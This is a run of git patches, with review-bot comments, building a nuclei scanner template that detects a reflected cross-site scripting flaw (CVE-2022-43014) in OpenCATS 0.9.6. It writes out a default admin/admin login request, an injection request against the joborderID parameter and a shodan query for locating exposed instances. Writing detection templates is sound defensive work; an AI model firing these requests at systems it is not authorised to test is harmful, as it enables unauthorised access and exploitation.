From b9c0977e5fe2371825d5d6c840fa65781ded9407 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Mon, 24 Oct 2022 18:45:28 +0530
Subject: [PATCH 1/5] Create CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 37 +++++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 cves/2022/CVE-2022-43014.yaml
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
new file mode 100644
index 0000000000..31c08e2177
--- /dev/null
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-43014
+
+info:
+ name: OpenCATS - Cross Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
+ tags: xss,cve,2022
+
+requests:
+ - raw:
+ - |
+ POST /index.php?m=login&a=attemptLogin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin&password=admin
+
+ - |
+ GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ''
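Review bot: The closing `type: word` matcher is the template's only evidence of reflection, and as shown on this page its single entry is an empty string (possibly stripped in rendering). An empty word is contained in every body, so the template would report any host that returns 200. Confirm that the committed file carries the full reflected marker. The same empty entry appears in the body matcher added in patch 2/5. Separately, the first raw request hard-codes `username=admin&password=admin` and the `description` never says a session is needed, so a clean result on an instance with changed credentials can be misread as "not vulnerable"; add a sentence such as `Requires valid OpenCATS credentials; the template logs in before probing joborderID.`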
From facef96006bf121f7f5b39f9fdc29d47d2aa1f5c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 25 Oct 2022 02:09:45 +0530
Subject: [PATCH 2/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 24 ++++++++++++++++++------
1 file changed, 18 insertions(+), 6 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 31c08e2177..2f2e1680fe 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -8,7 +8,11 @@ info:
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
- tags: xss,cve,2022
+ - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
+ metadata:
+ verified: true
+ shodan-query: title:"OpenCATS"
+ tags: cve,cve2022,xss,opencats
requests:
- raw:
@@ -20,7 +24,7 @@ requests:
username=admin&password=admin
- |
- GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
+ GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
@@ -28,10 +32,18 @@ requests:
cookie-reuse: true
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - 'CATS='
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: status
status:
- 200
-
- - type: word
- words:
- - ''
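Review bot: The new body matcher requires `'CATS='` alongside the reflected marker, but nothing in the template says what that string proves, so a later maintainer cannot tell whether it is safe to drop or tighten. Add a one-line comment above `- 'CATS='` stating its purpose; presumably it is the session parameter OpenCATS writes into authenticated pages, which the author should confirm. The matcher block is also not tied to the second request: nuclei evaluates it against each response in turn. If the match must come from the `ajax.php` response only, say so in a comment, or switch to a `dsl` matcher over `body_2` and `status_code_2`.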
From 56edbe25dbdbefc7dfeec965cbff523b306a5635 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 25 Oct 2022 14:59:18 +0530
Subject: [PATCH 3/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 19 +++++++++++++------
1 file changed, 13 insertions(+), 6 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 2f2e1680fe..124da07503 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -1,18 +1,20 @@
id: CVE-2022-43014
info:
- name: OpenCATS - Cross Site Scripting
+ name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-43014
+ classification:
+ cve-id: CVE-2022-43014
metadata:
verified: true
shodan-query: title:"OpenCATS"
- tags: cve,cve2022,xss,opencats
+ tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
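Review bot: The added `classification` block carries only `cve-id`, so `severity: medium` has nothing on the page backing it. Add `cwe-id: CWE-79` for the reflected XSS, and copy `cvss-metrics` and `cvss-score` from the NVD entry this hunk adds as a reference rather than estimating them. As a style point, the `name` would read better as `OpenCATS v0.9.6 - Cross-Site Scripting`, hyphenated the way the description's "cross-site scripting" is.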
@@ -21,14 +23,19 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- username=admin&password=admin
+ username={{username}}&password={{password}}
- |
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
- host-redirects: true
- max-redirects: 2
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+
cookie-reuse: true
matchers-condition: and
matchers:
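Review bot: Moving the login body to `{{username}}`/`{{password}}` does not remove the default-credential dependency, because the `payloads` block still pins both to `admin`. With one value per list, `attack: pitchfork` also does nothing. Take the credentials from run-time variables and add a comment above the first request saying so, for example `# supply credentials at run time: -var username=<user> -var password=<pass>`. Nothing in the template checks that the POST actually authenticated, so a failed login cannot be told apart from a patched instance; at minimum the description should state that a negative result is only meaningful when the supplied credentials are valid. The matcher block continues past the end of this hunk.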
From 845828de0fd88cabdea8190ae8b418e8b89ebb32 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 25 Oct 2022 16:39:45 +0530
Subject: [PATCH 4/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 7 -------
1 file changed, 7 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 124da07503..02d6a393b8 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -29,13 +29,6 @@ requests:
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
-
cookie-reuse: true
matchers-condition: and
matchers: